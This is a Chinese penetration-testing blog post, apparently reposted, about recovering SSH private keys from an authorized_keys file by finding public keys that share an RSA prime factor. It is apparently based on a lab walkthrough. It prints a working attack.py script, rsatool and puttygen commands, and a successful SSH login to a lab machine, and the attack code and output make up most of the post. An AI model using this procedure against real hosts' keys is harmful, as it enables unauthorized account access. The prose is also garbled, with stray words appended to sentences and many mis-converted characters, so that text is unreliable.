在一個機器上獲取大量PublicKey後的私鑰恢復方法

時間 2020-05-21

標籤一個機器獲取大量 publickey 恢復方法简体版

原文原文鏈接

滲透測試過程當中，有時候會在某個未受權訪問漏洞中獲取authorized_keys文件，裏面有大量帳戶用於免密登陸的PublicKey，這個時候如何進行下一步滲透?python

能夠考慮rsa碰撞的方式，找到公用p因子的兩個公鑰，從而逐步恢復出私鑰（具體原理不太明白，聽說來自一篇論文：https://factorable.net/weakkeys12.extended.pdf），本文方法學習自：https://hackso.me/rsa-1-walkthrough/，手動重寫了原文中的腳本，所有改成python執行，該腳本python2和python3兼容es6

*注：這裏須要rsa的基礎知識，最起碼須要知道rsa加密算法的兩個個因子：p、q 分別是什麼算法

*注：這種方法成功率相對較低，目前計算機性能算力算法的綜合做用下，找到公用p因子的可能性極低，因此想要成功須要有一個前提，authorized_keys文件中有大量公鑰shell

1、獲取authorized_keys文件，並執行如下腳本。----測試authorized_key文件和和attack.py腳本附在文末app

該腳本能夠算出哪兩個公鑰共用了一個p，並顯示出其對應的q是什麼ssh

root@kali:~/Desktop/Pentration# python3 attack.py [('2', '4', 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057, 154138482778403634422324585381094741396112094157924874391263694520821571222861298674105765179306306537493034017749692130071107610613435921888902004138078680460276016821583678249932808105907339203963186655685583329163374562641235896970977501756291570424272228689701476926803652905250957577229144433204452772127, 153278113332014430314822533712203891727299288836706793970670250689211994721080531031391472583116454287125291108401187935648312751844041461411234500935073837231805656247842743814066543045935616374230913460500896653516311833291062554618374636514900539486293512925569339760306744210644153977272176465759656466897)]

能夠看到第二和第四條公鑰共用了一個p性能

2、計算兩個公鑰對應的RSA私鑰學習

通過第一步，已經將SSH公鑰轉換爲了RSA公鑰，這裏根據所得p和q能夠計算出兩個公鑰對應的RSA私鑰，須要用到rsatools測試

root@kali:~/Desktop/Pentration/rsatool# ./rsatool.py -o user2.pem -p 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057 -q 154138482778403634422324585381094741396112094157924874391263694520821571222861298674105765179306306537493034017749692130071107610613435921888902004138078680460276016821583678249932808105907339203963186655685583329163374562641235896970977501756291570424272228689701476926803652905250957577229144433204452772127

root@kali:~/Desktop/Pentration/rsatool# ./rsatool.py -o user4.pem -p 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057 -q 153278113332014430314822533712203891727299288836706793970670250689211994721080531031391472583116454287125291108401187935648312751844041461411234500935073837231805656247842743814066543045935616374230913460500896653516311833291062554618374636514900539486293512925569339760306744210644153977272176465759656466897

3、生成兩個公鑰對應的SSH私鑰ui

通過第二步生成了兩個公鑰對應的RSA私鑰，接下來就能夠生成SSH私鑰，用於免密登陸

root@kali:~/Desktop/Pentration/rsatool# puttygen user2.pem -o user2 -O private-openssh-new root@kali:~/Desktop/Pentration/rsatool# puttygen user4.pem -o user4 -O private-openssh-new

生成的user2和user4就是咱們須要的SSH私鑰

4、免密登陸主機

root@kali:~/Desktop/Pentration/rsatool# ssh -i user2 user2@192.168.109.248 Last login: Sat Jan  5 01:46:12 2019 from 192.168.109.131 OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018 Welcome to OpenBSD: The proactively secure Unix-like operating system. Please use the sendbug(1) utility to report bugs in the system. Before reporting a bug, please try to reproduce it with the latest version of the code. With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a known fix for it exists, include that as well. rsafun$

已經成功登陸

*附件

一、attack.py

#attack.py
from itertools import combinations from fractions import gcd import subprocess import os file=open("authorized_keys") pubKeylist=file.readlines() tem1Name=1
for i in pubKeylist: tem1Name_t=str(tem1Name) file1_t=open("user"+tem1Name_t,'w') file1_t.write(i) file1_t.close() tem1Name+=1 file.close() #print(tem1Name)

for i in range(1,tem1Name): cmd="ssh-keygen -e -m PEM -f user"+str(i)+" | "+"openssl rsa -RSAPublicKey_in -modulus -noout" rdata=subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.readlines() for j in rdata: j=bytes.decode(j).split('=')[1] tem2Name=str(i) file2_t=open("user"+tem2Name+".n",'w') file2_t.write(j) file2_t.close() list = [] dict = {} result = [] # build list
for i in range(9): list.append(str(i+1)) # build dictionary
for x in list: dict[x] = int(open("user"+x+".n", 'r').read(), 16) # gcd
for (i, j) in combinations(list, 2): p = gcd(dict[i], dict[j]) if (p != 1): result.append((i, j, p, int(dict[i]//p), int(dict[j]//p))) break

print(result) os.system("rm user*")

二、authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4aOHSLLqN+odwP6G1GdxqJ+I/e1PuX3EbFe64snwy7IFAY8WrPBEsIqEWesOqUXzBI7G6YbiR13nen0XWqZtSn1yBbt1U1a8M+19phOVyo4Awx/wTvpG0EPYLI3H9J5aIOcBntXo6rrpiidMT2jYthUxwKKNUUHkbmLJ6QP9jNpCGZwm2CXO0GLmnFBYbE+53xKbX1DVD7aEiRxi62XhoUsepAsUJOzt4enAp3WuyMz9f8IlWg2BUiUFqlVImNRm9UuuoXhsBItLOcF0DHBgRZN4cFZyZO2x73SOJ5oJIikA3NhJ9rYwrE01HsKwYxhqXB94rM/SBTcJ5c6xes6Er user1@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8i9Nk6Rpd6SlRG/FSPy/M8OXVEO/akLMVaNNJEpejOQ/ekdlTKyBMb4pIEwoKpu+PTTeAzigSNNTNg1TONyK0CsPJ3Uj1oJIrJXYNAFm7kxqQD2pKDIGB0hYj1pwivTLnNhh5cnS7Mnm9ijJPHQ8TEyade9a0v9Ps4BAFEIl9HfjkFm/KDTcQjuBjPTaYgazY5b/EHyfLf2deHeFT4AwzWBa7NdiFKKn5eXComWYIiBcUYWRf0ROd/Tx2aF3Q/hxmbS8ImR4l0ZRdsh6V+gmQzp2eAzNeN9QmJzF2gaDQGZBcKf0gpA8gj0prIcnLFctI6seS+an+N6yUW/bwNBM3 user2@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCQ8ZjTDIcdjaAwSTS1u83FspC6iVba2a1W1jS+UVw+zrxc06xEeTBmdt4p0J9cWCK97pMrBR+dquuLikaSxfI6BxhZY+6MKTnghjI8MiktgpjEOJNA6rfOJzBoIvvQr4E3LJu0gRVDLoSoseDI1Vb9d5AwKQTjGSXGofIpsNzSrwLgu4JKvZAjIfvv/z0bk5VwBmjtJVntlMOBkPyD6ZuGoiWacUH8AFe2lT9h++G6IoIznPQCrIfeKUrIRwbWJWqTumy8RDCKVgTUUYszkq/r1/wAsR1HhZJVon/JczRsZ3ZZL84Zpja0EuYFZKjPgHsewN3pnUEHzWR4b9bCu8dz user3@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7fmeWcwd24gYuSYBgQmO8mr394YsLYvVN46pGPvjEvpLwEXJ/K6JoLYpBX6EKEqj8mvx04YSy5IsZAjYbraRbhtpOmLXRBSOPwnhzUUcBHQANkKpq5pdJrEdD3xzG0CuHF80P0HY9tG/ZXY8J+LJ+LWyL4H0upWRGTcjGm7fZxyRVg2tI2gLPlN3zHpBji92nQ+CXyJPLOFhq8+/fls143tkJ3LissqgOPnLTQkdm6H9XbaWcgLao7ALXEgyXKWMZrMdEbpBiqOsTyBpwpIM3A7iAPu/1QqsPqnwKUbH7z6zn8TbfoPABN+MbvnEmj4jALqhDAnWAaMfq0yUWm5k5 user4@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCge/tLWGuAwvfAZ6jZUVQ+JzhdSlanJduRV8urB94AlP82Rm5y1LMuAy70z0VTE2SNzMG2yqAFGtbfUvkoqfD5WnWG9oHJaoiaJnfxvOLKgNEztTTAdFdMDLHkD3hh4NdxH7aZxQIxHUWtKOhuZ8h73toH7tAkChPkaSO6G79hb2pciCP//TnJfc59Fd5fNQEdROQ8Ekp1mONrqCJAgKJn5BvzXeGAwpxbLpvyJFcW6uTj98GoE9qPSItt5/DPn9oVOX1RgTQjSDqZZq2m1rLtLIs9RIYu/xPTWQ2AsAHvrTCDoNo00ebQPDFz0MzTP8bIyw8ObpoWtdqkEUqi35/r user5@rsafun
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD00XwLgzJK9Ocwzid87PcnLf7DkZdoggvl624q0vSMKKDNpbj4DNdL8naR5XEoqx2t265AQcUyc2JOQKqMbPuyWdjX6GbYkAa7quWVh0B6W+7qoVLFWmJOi63Rzyrm/TRoHBjJI8jN6bBVoINnm7q0sjJw3xCYEACVR5CM+BLc9sNaVbRmsS1Nu434QeJ4GEiEcdf9LdjvUSZAClAeXcZ6W5hnGg2GCc9Rbo3eFfeXj7A8pk7VZKxhdACnOcYRcAIVUOoPHQUgE4BDTDPKDA5tM7Bf9aGfaIw2j9OnzpYUfen8DGK/LzktpBn10In2R05HXojO6pMrLvJ+81rGqy3x user6@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDlKXFK6oJ4dJtesy2EwTjaq3HpXsvEYraPynrz4zFc1N8KnPiRdZBlX6opIQsxwseUUQXso+0VQ9v4nG3q0/bzKjmFJwg6j16M+P7KndYr1MM8U2tSQ+YOibPJ2FONF9VlPHF3mFviUI+fYGgb1p47Dxj/SQ5s1vuBk4Lf/FTJV3qAEvhwBYA7HysO83SBwSBA+DS64BAWXofZxpOKXET4Q+IKT3d7hIVaFJgWi9q1NRFeHZ0B3AtlrQ+QCppMiZU4aDwl5wGYuV+4QDlkTtQCwilaa2kc5ujbzJhCeww3pMSa0cr5G90a6lwf+GkX+NoumwsoqxgRgj9i1o2BxdKp user7@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5bur6r9Kq2SB4YGmSFI14K6X8o4LAM6ZQLoMgp52W6NUz2TUFTAXdMkMVBS+dG2wSbcyuZ59Cc6vi2ehQViJmx1vzev2Ejj+bQIPagh6SU/oWRa/KiqlYdzjQsntS5IVQD4WX0kq7zOKDoNLqUhkgmZDBdISN/TRO+iEmKLKowoJlR5EDudLJqY+lZ6wwNtgwG4tMK5c/Czx41pIm1OKw09c23FD0/GGXv0JDBplku+Jjr1CNc+M7QkeVSDXwf8BzkNzWkkQnGxwJQF0ufVuuzkZ9C9Ub0MTvDzMcefiWz3oSkVWz5HeFe2ROS2rBFYUm5M48TrsD5bLYEn6i4LDh user8@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUC0NKyGoR1EqOS1suQK0YfitFIt0lFkpwKVYVP4YD86aSiPqpWI6rRsLBevGxOfDdRFHqMmzx4S0tVJfYErs7O7X20xWy6oJJRX67h1QghDZOa8hWEFPSr2qlOhNTvfp9yJbTKvCzStSYN0AR81MiuLn6uSmr6N2LUU02mmA1JmuZlO/ilqU7/fECNY9Dl/hrX7oIqvbpxXZDfxa25PQqy9uTrZe71sCkBkdZ11qj+4hkWPUWrhZgosJXJb61h9QGbmhzte3YyJ6RoEzz3ozFamYBzuyszX/4Ne4juBXzXoD5+En+kFIMnfNk5bVYeD4XG6a8jDDcKzsFrvWZ7zgD user9@rsafun

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。